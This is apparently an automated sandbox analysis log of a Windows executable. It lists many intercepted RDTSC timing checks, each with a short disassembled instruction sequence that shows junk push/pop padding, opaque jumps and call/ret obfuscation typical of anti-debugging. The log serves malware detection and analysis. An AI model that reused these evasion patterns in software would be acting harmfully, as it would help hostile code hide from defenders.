Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13C0F00 second address: 13C0F32 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F1D94F81637h 0x00000009 popad 0x0000000a jmp 00007F1D94F81632h 0x0000000f push eax 0x00000010 push edx 0x00000011 push edx 0x00000012 pop edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13C1095 second address: 13C109F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13C109F second address: 13C10AB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 pushad 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13C10AB second address: 13C10B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007F1D94C8C5B6h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13C1CB3 second address: 13C1CCC instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F1D94F8162Fh 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13C1E5B second address: 13C1E5F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13C20F6 second address: 13C2114 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F1D94F8162Dh 0x00000008 jg 00007F1D94F81626h 0x0000000e jl 00007F1D94F81626h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13C663F second address: 13C6645 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13C6645 second address: 13C6649 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13C6649 second address: 13C6660 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F1D94C8C5B6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f jbe 00007F1D94C8C5BCh 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1381D43 second address: 1381D47 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1381D47 second address: 1381D5B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007F1D94C8C5B6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jl 00007F1D94C8C5BCh 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1381D5B second address: 1381D5F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1381D5F second address: 1381D7D instructions: 0x00000000 rdtsc 0x00000002 jl 00007F1D94C8C5D0h 0x00000008 jmp 00007F1D94C8C5C4h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1381D7D second address: 1381D84 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13C9A16 second address: 13C9A1A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13C9A1A second address: 13C9A24 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13C9A24 second address: 13C9A28 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13C9E6C second address: 13C9E7A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F1D94F8162Ah 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13C9E7A second address: 13C9E7E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13C9F7F second address: 13C9F8D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov eax, dword ptr [esp+04h] 0x00000008 push eax 0x00000009 push edx 0x0000000a push ecx 0x0000000b pushad 0x0000000c popad 0x0000000d pop ecx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13CE267 second address: 13CE277 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F1D94C8C5B6h 0x00000008 jnp 00007F1D94C8C5B6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13CE7F6 second address: 13CE7FE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13CE7FE second address: 13CE802 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13CE95C second address: 13CE979 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F1D94F81639h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13CE979 second address: 13CE997 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F1D94C8C5B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d jmp 00007F1D94C8C5BEh 0x00000012 push edi 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13CE997 second address: 13CE9AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pushad 0x00000006 jmp 00007F1D94F8162Fh 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13CEAFA second address: 13CEAFF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13CEAFF second address: 13CEB05 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13CEB05 second address: 13CEB0B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13CEB0B second address: 13CEB0F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13CEB0F second address: 13CEB13 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13CEB13 second address: 13CEB26 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b je 00007F1D94F8162Ch 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13CEB26 second address: 13CEB3C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 jng 00007F1D94C8C5B6h 0x0000000b pop ebx 0x0000000c push eax 0x0000000d push edx 0x0000000e jo 00007F1D94C8C5B6h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13CEB3C second address: 13CEB40 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13CEB40 second address: 13CEB44 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13D1055 second address: 13D106F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1D94F8162Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 js 00007F1D94F8162Ch 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13D178A second address: 13D17D9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F1D94C8C5C3h 0x00000009 popad 0x0000000a popad 0x0000000b mov dword ptr [esp], ebx 0x0000000e push 00000000h 0x00000010 push edx 0x00000011 call 00007F1D94C8C5B8h 0x00000016 pop edx 0x00000017 mov dword ptr [esp+04h], edx 0x0000001b add dword ptr [esp+04h], 00000016h 0x00000023 inc edx 0x00000024 push edx 0x00000025 ret 0x00000026 pop edx 0x00000027 ret 0x00000028 mov edi, dword ptr [ebp+122D3A41h] 0x0000002e push eax 0x0000002f jbe 00007F1D94C8C5C2h 0x00000035 je 00007F1D94C8C5BCh 0x0000003b push eax 0x0000003c push edx 0x0000003d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13D1D3E second address: 13D1D42 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13D1D42 second address: 13D1D8E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F1D94C8C5BCh 0x0000000b popad 0x0000000c mov dword ptr [esp], eax 0x0000000f push 00000000h 0x00000011 push esi 0x00000012 call 00007F1D94C8C5B8h 0x00000017 pop esi 0x00000018 mov dword ptr [esp+04h], esi 0x0000001c add dword ptr [esp+04h], 00000014h 0x00000024 inc esi 0x00000025 push esi 0x00000026 ret 0x00000027 pop esi 0x00000028 ret 0x00000029 jc 00007F1D94C8C5B8h 0x0000002f mov edi, ecx 0x00000031 clc 0x00000032 xchg eax, ebx 0x00000033 push eax 0x00000034 push edx 0x00000035 jmp 00007F1D94C8C5BEh 0x0000003a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13D1D8E second address: 13D1D94 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13D1D94 second address: 13D1D98 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13D1D98 second address: 13D1DAB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a pushad 0x0000000b js 00007F1D94F81626h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13D22B1 second address: 13D22B7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13D22B7 second address: 13D22BB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13D2D9C second address: 13D2DC3 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jmp 00007F1D94C8C5C6h 0x00000008 pop edi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push edx 0x0000000f jp 00007F1D94C8C5B6h 0x00000015 pop edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13D2B90 second address: 13D2B94 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13D2DC3 second address: 13D2DC8 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13D2B94 second address: 13D2B98 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13D476D second address: 13D4772 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13D446F second address: 13D4473 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13D5139 second address: 13D5179 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pop esi 0x00000006 nop 0x00000007 jc 00007F1D94C8C5BCh 0x0000000d push 00000000h 0x0000000f push 00000000h 0x00000011 push ecx 0x00000012 call 00007F1D94C8C5B8h 0x00000017 pop ecx 0x00000018 mov dword ptr [esp+04h], ecx 0x0000001c add dword ptr [esp+04h], 00000014h 0x00000024 inc ecx 0x00000025 push ecx 0x00000026 ret 0x00000027 pop ecx 0x00000028 ret 0x00000029 push 00000000h 0x0000002b add esi, dword ptr [ebp+122D29A4h] 0x00000031 xchg eax, ebx 0x00000032 push eax 0x00000033 push edx 0x00000034 push eax 0x00000035 push edx 0x00000036 push eax 0x00000037 push edx 0x00000038 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13D5179 second address: 13D517D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13D517D second address: 13D5187 instructions: 0x00000000 rdtsc 0x00000002 js 00007F1D94C8C5B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13D5187 second address: 13D5191 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jc 00007F1D94F81626h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13D5191 second address: 13D51B3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1D94C8C5C0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f jg 00007F1D94C8C5B6h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13D51B3 second address: 13D51B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13D594F second address: 13D595F instructions: 0x00000000 rdtsc 0x00000002 je 00007F1D94C8C5B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edi 0x0000000b push eax 0x0000000c pushad 0x0000000d push esi 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13D662A second address: 13D663C instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F1D94F81628h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13D663C second address: 13D6640 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13D6FFA second address: 13D6FFE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13D6FFE second address: 13D7010 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 push eax 0x00000008 jng 00007F1D94C8C5C4h 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13D7010 second address: 13D7014 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13D6E04 second address: 13D6E0F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13D782A second address: 13D782E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13D6E0F second address: 13D6E13 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13D9A31 second address: 13D9A55 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pop edi 0x00000006 nop 0x00000007 mov dword ptr [ebp+124635A3h], edi 0x0000000d push 00000000h 0x0000000f mov dword ptr [ebp+122D2875h], edi 0x00000015 push 00000000h 0x00000017 mov ebx, edi 0x00000019 push eax 0x0000001a jbe 00007F1D94F81634h 0x00000020 push eax 0x00000021 push edx 0x00000022 push eax 0x00000023 push edx 0x00000024 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13D9A55 second address: 13D9A59 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13DA856 second address: 13DA85B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13DA85B second address: 13DA8D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c mov ebx, edi 0x0000000e mov bx, dx 0x00000011 push 00000000h 0x00000013 push 00000000h 0x00000015 push edx 0x00000016 call 00007F1D94C8C5B8h 0x0000001b pop edx 0x0000001c mov dword ptr [esp+04h], edx 0x00000020 add dword ptr [esp+04h], 00000018h 0x00000028 inc edx 0x00000029 push edx 0x0000002a ret 0x0000002b pop edx 0x0000002c ret 0x0000002d pushad 0x0000002e mov ebx, dword ptr [ebp+122D373Dh] 0x00000034 pushad 0x00000035 mov dword ptr [ebp+122D2AB5h], esi 0x0000003b mov ecx, ebx 0x0000003d popad 0x0000003e popad 0x0000003f jp 00007F1D94C8C5BCh 0x00000045 push 00000000h 0x00000047 jg 00007F1D94C8C5CDh 0x0000004d xchg eax, esi 0x0000004e push eax 0x0000004f push edx 0x00000050 pushad 0x00000051 jbe 00007F1D94C8C5B6h 0x00000057 push eax 0x00000058 pop eax 0x00000059 popad 0x0000005a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13DA8D8 second address: 13DA8DE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13DA8DE second address: 13DA8EF instructions: 0x00000000 rdtsc 0x00000002 jo 00007F1D94C8C5B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push ecx 0x0000000e push ebx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13DBAEC second address: 13DBB07 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1D94F81637h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13DBB07 second address: 13DBBB6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1D94C8C5C5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c push 00000000h 0x0000000e push ecx 0x0000000f call 00007F1D94C8C5B8h 0x00000014 pop ecx 0x00000015 mov dword ptr [esp+04h], ecx 0x00000019 add dword ptr [esp+04h], 0000001Ah 0x00000021 inc ecx 0x00000022 push ecx 0x00000023 ret 0x00000024 pop ecx 0x00000025 ret 0x00000026 mov ebx, dword ptr [ebp+122D35C8h] 0x0000002c push dword ptr fs:[00000000h] 0x00000033 mov dword ptr fs:[00000000h], esp 0x0000003a push 00000000h 0x0000003c push ecx 0x0000003d call 00007F1D94C8C5B8h 0x00000042 pop ecx 0x00000043 mov dword ptr [esp+04h], ecx 0x00000047 add dword ptr [esp+04h], 0000001Ah 0x0000004f inc ecx 0x00000050 push ecx 0x00000051 ret 0x00000052 pop ecx 0x00000053 ret 0x00000054 mov bh, dl 0x00000056 mov dword ptr [ebp+122D2875h], edx 0x0000005c mov eax, dword ptr [ebp+122D0969h] 0x00000062 xor dword ptr [ebp+12462FBFh], edi 0x00000068 push FFFFFFFFh 0x0000006a mov dword ptr [ebp+12463539h], eax 0x00000070 nop 0x00000071 push eax 0x00000072 push edx 0x00000073 jl 00007F1D94C8C5CCh 0x00000079 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13DDBCE second address: 13DDBD5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13DDBD5 second address: 13DDBE3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13DDBE3 second address: 13DDBE7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13DDBE7 second address: 13DDBED instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13DCC2C second address: 13DCC44 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pop esi 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F1D94F8162Fh 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13DCC44 second address: 13DCC4A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13DCD18 second address: 13DCD1C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13DFBD7 second address: 13DFBF5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 jmp 00007F1D94C8C5C5h 0x0000000b push eax 0x0000000c pop eax 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1399359 second address: 139936A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 jne 00007F1D94F81626h 0x0000000c popad 0x0000000d pushad 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13DDDF3 second address: 13DDDF8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 139936A second address: 1399389 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pushad 0x00000008 jmp 00007F1D94F81635h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13E117E second address: 13E1182 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13E1182 second address: 13E1186 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13E1186 second address: 13E118C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13E0387 second address: 13E038B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13E308A second address: 13E3095 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 13E2194 second address: 13E21AC instructions: 0x00000000 rdtsc 0x00000002 jo 00007F1D94F81626h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f jng 00007F1D94F81626h 0x00000015 pushad 0x00000016 popad 0x00000017 popad 0x00000018 rdtsc
